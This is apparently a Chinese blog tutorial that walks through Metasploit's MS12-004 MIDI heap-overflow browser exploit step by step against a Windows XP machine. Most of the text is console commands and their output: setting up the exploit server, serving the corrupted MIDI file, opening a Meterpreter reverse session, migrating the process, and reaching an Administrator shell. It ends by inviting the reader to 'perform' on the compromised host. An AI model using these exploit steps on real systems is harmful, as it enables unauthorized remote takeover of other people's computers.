Meatsploit之MS12_004漏洞的利用

关于MS12_004漏洞的利用

  • 1.打开msf控制台

    root@kali:~# msfconsole
    

    ps:可能会用到这个 /etc/init.d/postgresql start(管理员权限)

  • 2.查找漏洞利用模板

    msf > search 12_004
    
    Matching Modules
    ================
    
       Name                                   Disclosure Date  Rank    Description
       ----                                   ---------------  ----    -----------
       exploit/windows/browser/ms12_004_midi  2012-01-10       normal  MS12-004 midiOutPlayNextPolyEvent Heap Overflow
    
  • 3.利用漏洞

    msf > use exploit/windows/browser/ms12_004_midi
    

    msf变成了这样__msf exploit(ms12_004_midi) >

  • 4.查看配置信息

    msf exploit(ms12_004_midi) > show options
    
    Module options (exploit/windows/browser/ms12_004_midi):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       OBFUSCATE  false            no        Enable JavaScript obfuscation
       SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT    8080             yes       The local port to listen on.
       SSL        false            no        Negotiate SSL for incoming connections
       SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
    URIPATH                     no        The URI to use for this exploit (default is random)
    
Exploit target:
   Id  Name
   --  ----
   0   Automatic
  • 5.设置SRVHOST(本机IP地址)

    msf exploit(ms12_004_midi) > set SRVHOST 192.168.43.80
    SRVHOST => 192.168.43.80
    
  • 6.设置URIPATH(访问网页的名字,任意)

    msf exploit(ms12_004_midi) > set URIPATH 1
    
    URIPATH => 1
    
  • 7.开始渗透

    msf exploit(ms12_004_midi) > exploit
    
    [*] Exploit running as background job.
    
    [*] Started reverse TCP handler on 192.168.43.80:4444 
    msf exploit(ms12_004_midi) > [*] Using URL: http://192.168.43.80:8080/1
    [*] Server started.
    
[*] 192.168.43.35    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.43.35    ms12_004_midi - Sending html to 192.168.43.35:1090...
[*] 192.168.43.35    ms12_004_midi - Request as: Windows-Media-Player/9.00.00.3250
[*] 192.168.43.35    ms12_004_midi - Sending midi corruption file...
[*] 192.168.43.35    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.43.35    ms12_004_midi - Sending html to 192.168.43.35:1094...
[*] 192.168.43.35    ms12_004_midi - Request as: Windows-Media-Player/9.00.00.3250
[*] 192.168.43.35    ms12_004_midi - Sending midi corruption file...
[*] 192.168.43.35    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.43.35    ms12_004_midi - Sending midi corruption file...
[*] Sending stage (957487 bytes) to 192.168.43.35

msf exploit(ms12_004_midi) > [*] Meterpreter session 1 opened (192.168.43.80:4444 -> 192.168.43.35:1096) at 2017-07-16 02:11:59 -0400

[*] Session ID 1 (192.168.43.80:4444 -> 192.168.43.35:1096) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3612)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3324
[+] Successfully migrated to process 
  • 9.设置获取的session ID

    msf exploit(ms12_004_midi) > sessions -i 1
    
    [*] Starting interaction with 1...
    
  • 10.得到权限之后输入变成了___meterpreter >

    meterpreter > shell
    Process 1552 created.
    Channel 1 created.
    Microsoft Windows XP [�汾 5.1.2600]
    (C) ��Ȩ���� 1985-2001 Microsoft Corp.
    
    C:\Documents and Settings\Administrator\����>
    

接下来就开始你的表演吧!

具体可以做哪些事情百度一下就全知道了

-------------本文结束感谢您的阅读-------------
0%